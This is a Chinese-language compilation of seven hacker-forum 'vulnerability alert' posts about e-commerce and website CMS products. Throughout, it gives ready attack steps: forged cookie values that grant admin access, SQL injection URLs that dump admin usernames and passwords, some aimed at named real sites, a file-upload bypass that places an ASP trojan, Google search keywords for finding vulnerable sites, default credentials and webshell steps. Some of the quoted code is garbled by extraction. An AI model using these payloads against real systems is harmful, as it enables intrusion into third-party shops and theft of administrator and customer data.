以下是小编为大家准备的XPSHOP商城系统Cookies欺骗漏洞漏洞预警,本文共7篇,欢迎大家前来参阅。

篇1:XPSHOP商城系统Cookies欺骗漏洞漏洞预警
文章作者:121711090
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
无意中发现这个漏洞的..官方现在还不知道...我没有在别处公布哦..
这个漏洞不好...要直拉改人家管理员密码!!有点儿缺德!!!...
但为了我们的网络更安全..还是看看吧...
首先先看看这个站吧:demo1.xpshop.cn/
先注册一个用户进去..为了方便也为了不要那么垃圾账户在人家系统里.我这说一下我注册好了的用户名:wc1217 密码:77423704
好..还是用啊D打开网站比较好..看截图:记得要保留cookies
之后便看看他的Cookies...
代码:
LoginCode=0684; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=14
我们改一下这两个值:LoginCode=0684;mid=14 .......都改成1 :
代码:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=3pxjo23zuikyrk45mx0g4a55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1
点击修改..后右键刷新看一下..要注意.不要刷得太快...不然就没用了..
之后就成这样了:
当然..也有可能没有..那我们就要改一下:“ASP.NET_SessionId=” 这个值就好了..随便改一个字就行:如下:
代码:
LoginCode=1; demo1.xpshop.cnResource=zh-cn; ASP.NET_SessionId=fu1q1w3g3qc2vn55naohei55; XpShop_CartID=0f810c00-fbbf-4984-951e-555357b14a54; demo1.xpshop.cnLogin=mid=1
好了..现在再看看会员信息:
是不是有一个“找回密码答案:”呵.....个位都想到了吧..直接就能改管理员密码了..
demo1.xpshop.cn/memberLostpass.aspx这个是改密码的..
如下图:
成功.....demo1.xpshop.cn/admin/default.aspx这里登录后就是怎么拿WEBSHELL了..
可是我一直没弄成..理论是只有这样才行..看..
先插马..再备份..但这里出错了..
还望达人能想出更好的办法..
我想了一晚上了....没辙了....
demo1.xpshop.cn/admin/ftb.imagegallery.aspx?frame=1&rif=admin&cif=admin 这可以列目录
好..就那么多了....有哪位达人弄出好办法了..千万别望了告诉我呀...联系方式:blog.sina.com.cn/qq1217
demo1.xpshop.cn/helps/t.txt
添加flash广告处可直接上传马
营销管理 - flash广告添加
篇2:Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警
Shopv8 商城系统 v12.07,程序下载:www.mycodes.net/20/1099.htm
漏洞文件:list.asp
127.0.0.1/list.asp?id=338
注入中转爆帐号密码
127.0.0.1:808/jmCook.asp?jmdcw=338%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,password,username,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52%20from%20admin
测试的时候关闭js脚本,不然会跳转的,
Shopv8 商城系统 v12.07 Cookies 注入漏洞漏洞预警
,
转自:www.90sec.org/thread-2883-1-1.html
篇3:mvmmall网店商城系统注入漏洞漏洞预警
mvmmall网店商城系统最新注入0day问题出在搜索search.php这个文件上,
代码如下:
require_once ‘include/common.inc.php’;
require_once ROOTPATH.’header.php’;
if($action!=’search’){
$search_key = ”;
if (isset($ps_search))
{ //省略一堆东西
$tag_ids = array; //在if里
//继续省略
while ($row = $db->fetch_array($result)) {
$tag_ids[] = $row['goods_id'];
} //也是在if里
}
//省略一堆东西
} //结束if里的东西
//商品标签搜索
$tag_ids = array_unique($tag_ids); //没有ps_search他就没初始化!可自行输入
$tag_search = implode(‘,’,dhtmlchars($tag_ids)); //dhtmlchars过滤HTML标签不用理会
$tag_search && $tag_search = “OR uid IN($tag_search)”; //呼…..成功了!
//省略无关东西
$search_sql = “WHERE upv = ’1′ AND up_date<=’$m_now_time’”.” AND (( 1 ” . $cat_search . $search_key . $brand_search . $min_search . $max_search .” ) “.$tag_search.” )”;//没有单引号的….
$total_count = $db->counter($mvm_goods_table,$search_sql);
用ADMIN的用户和MALL后用找回密码功能 mvm_lostpass存放验证串直接改密码了,
测试EXP:
www.dj4now.com/search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20user())%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23
BY:www.dj4now.com/
篇4:毕业论文选题系统上传漏洞漏洞预警
漏洞出在fileload目录下的FileUpload.asp文件中,用的是无惧组建上传
看代码
01var fu = new FileUpload(“uploadForm”,“idFile”, { Limit: 3, ExtIn: [“rar”,“doc”,“xls”], RanName: true,
02onIniFile: function(file){ file.value ? file.style.display =“none” : this.Folder.removeChild(file); },
03onEmpty: function(){ alert(“请选择一个文件”); },
04onLimite: function(){ alert(“超过上传限制”); },
05onSame: function(){ alert(“已经有相同文件”); },
06onNotExtIn: function(){ alert(“只允许上传” + this.ExtIn.join(“,”) +“文件”); },
07onFail: function(file){ this.Folder.removeChild(file); },
08onIni: function(){
09//显示文件列表
10var arrRows = [];
11if(this.Files.length){
12var This = this;
13Each(this.Files, function(o){
14var a = document.createElement(“a”); a.innerHTML =“取消”; a.href =“javascript.:void(0);”;
15a.onclick = function(){ oThis.Delete(o); return false; };
16arrRows.push([o.value, a]);
17});
18} else { arrRows.push([“没有添加文件”,“ ”]); }
19AddList(arrRows);
20//设置按钮
21$(“idBtnupload”).disabled = $(“idBtndel”).disabled = this.Files.length <= 0;
22}
23});
24
25$(“idBtnupload”).onclick = function(){
26//显示文件列表
27var arrRows = [];
28Each(fu.Files, function(o){ arrRows.push([o.value,“ ”]); });
29AddList(arrRows);
30
31fu.Folder.style.display =“none”;
32$(“idProcess”).style.display =“”;
33$(“idMsg”).innerHTML =“正在上传文件到服务器,请稍候……
有可能因为网络问题,出现程序长时间无响应,请点击“取消”重新上传文件”;
34
35fu.Form.submit();
36}
37
38//用来添加文件列表的函数
39function AddList(rows){
40//根据数组来添加列表
41var FileList = $(“idFileList”), Fragment = document.createDocumentFragment();
42//用文档碎片保存列表
43Each(rows, function(cells){
44var row = document.createElement(“tr”);
45Each(cells, function(o){
46var cell = document.createElement(“td”);
47if(typeof o ==“string”){ cell.innerHTML = o; }else{ cell.appendChild(o); }
48row.appendChild(cell);
49});
50oFragment.appendChild(row);
51})
52//ie的table不支持innerHTML所以这样清空table
53while(FileList.hasChildNodes()){ FileList.removeChild(FileList.firstChild); }
54FileList.appendChild(oFragment);
55}
56
57
58$(“idLimit”).innerHTML = fu.Limit;
59
60$(“idExt”).innerHTML = fu.ExtIn.join(“,”);
61
62$(“idBtndel”).onclick = function(){ fu.Clear(); }
63
64//在后台通过window.parent来访问主页面的函数
65function Finish(msg){ alert(msg); location.href = location.href; }
66
67
68注意:
69
·请选择【rar,doc,xls】格式的文件,其他格式的文件请打包后再上传,
毕业论文选题系统上传漏洞漏洞预警
,
70
·文件名尽量详细,以方便下载。
71
·文件不能过大。
72
73
没有将文件重命名,外加本地JS验证。配合IIS6.0解析漏洞 如果是IIS7 的话用火狐
漏洞利用方法:
访问www.xxx.com/fileload/FileUpload.asp 然后将ASP木马改为1.asp;.rar 或者asp;.xsl 也行 上传后的文件存在/fileload/file/下面
网站系统下载地址:down.admin5.com/asp/60831.html
篇5:聚商宝2.0暴库及cookies欺骗缺陷及修复漏洞预警
程序:聚商宝2.0
google关键字:intext:技术支持:奔明科技 聚商宝
前几天遇到了个程序叫聚商宝,把源码下载过来了,今天才有时间简单的看了看……
漏洞:暴库以及后台cookies欺骗
1)直接访问conn/conn.asp 暴出数据库地址,下载,解密,登录后台
2)cookies欺骗,admin文件夹下check.asp文件中的代码片段:
dim uid,upwd www.****.com
uid=Replace_Text(Request.Form(“userid”))
upwd=md5(Replace_Text(Request.Form(“password”)),16)
Verifycode=Replace_Text(request.Form(“verifycode”))
if not isnumeric(Verifycode) then
Call Logerr
Call ErroFy()
end if
if Cint(Verifycode)Session(“SafeCode”) then
Call ErroFy()
Sub ErroFy()
response.write“”
response.write“”
response.write“出现错误提示”
response.write“
验证码错误!”
response.write“<< 返回上一页”
response.write“”
response.write“”
Response.End()
End Sub
else
Set rs=server.createobject(“adodb.recordset”)
sqltext=“select * from benming_master where Username='” & uid & “' and [PassWord]='” & upwd & “'”
rs.open sqltext,conn,1,1
If Rs.Eof And Rs.Bof Then
response.write“”
response.write“”
response.write“出现错误提示”
response.write“
登陆名或密码不正确!”
response.write“<< 返回上一页”
response.write“”
response.write“”
else
Response.Cookies(“globalecmaster”)=rs(“username”)
Response.Cookies(“masterflag”)=rs(“flag”)
Response.Cookies(“adminid”)=rs(“id”)
LastLogin=Date()
LastLoginIP=getIP()
sql=“update benming_master set LastLogin='”&LastLogin&“',LastLoginIP='”&LastLoginIP&“' where username='”&uid&“'”
conn.execute(sql)
response.write“”
response.write“”
response.write“登陆成功提示”
response.write“
成功通过网站后台管理员身份认证!
2秒后自动进入后台…”
response.write“进入后台管理”
response.write“”
response.write“”
%>
<%
end if
rs.close
set rs=nothing
end if
利用方法:用啊D直接访问后台,修改如下cookie,然后访问admin/index.asp登录,
聚商宝2.0暴库及cookies欺骗缺陷及修复漏洞预警
,
globalecmaster=admin; masterflag=01%2C%%2C%%2C%%
2C%%2C%%2C%%2C%%2C%%2C%0; adminid=1
篇6:乌邦图企业网站系统 cookies 注入漏洞预警
基于asp+access的企业网站源码,数据库已设有有防下载,网站更安全,要修改网站,自定义你自己要的页面,和美化页面都是你自己完成,网站源码程序完整,后台功能强大。
源码下载:www.aspjzy.com/12746.html
程序完整登陆后台:/admin/login.asp
默认登陆帐号:admin 密码:admin888
语句:(前面加个空格)
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
或者是16个字段:
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
爆不出来自己猜字段,
注入点:www.xueyu.org/shownews.asp?=88
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
关键字:
inurl:shownews?asp.id=
篇7:正版逍遥网店系统 V3.0 COOKIE欺骗漏洞漏洞预警
OK开始,这是一个网店,本来我想先找注入,貌似注入都过滤了,于是我又来到后台,看了下检测文件,悲剧由此产生:
漏洞文件:checkadmin.asp
<%
if request.cookies(“buyok”)(“admin”)=“” then response.write “
%>
大家看到这里一定以为很简单吧,呵呵 直接COOKIE欺骗就可以进后台,如果真的这样我就不发了~!留个悬念让大家去试试。
然后我进入后台,127.0.0.1/admin/index.asp.自动跟我弹了回来。我当时就郁闷了。继续看代码。
index.asp
网店后台管理
此网页使用了框架,但您的浏览器不支持框架,
看到这里我奇怪了,是调用checkadmin.asp啊 为什么进不了后台。我看到了main.asp。
继续跟进。代码就不发了免得多,最后发现了一个文件。
漏洞文件:include\buyok_functions.asp
下面贴出部分代码:
set rscheck=conn.execute(“select * from buyok_user where UserId='”&request.cookies(“buyok”)(“userid”)&“'”)
if rscheck.eof and rscheck.bof then
response.write “”
response.end
看到这里大家都懂了吧 呵呵~!
OK附上EXP:
KHWJCNQIVQNSXKMKKYHP=GVPLGBWIQTXZICBWSAALROKUCZBJDYHJMYPDEMHE; buyok=userid=1&temp=login&admin=admin;
修改COOKIE 然后直接进入127.0.0.1/admin/index.asp.
后台:localhost/admin/login.asp
作者:风之传说
★淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警
★iShowMusic V1.2 写入shell漏洞漏洞预警
★阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警
文档为doc格式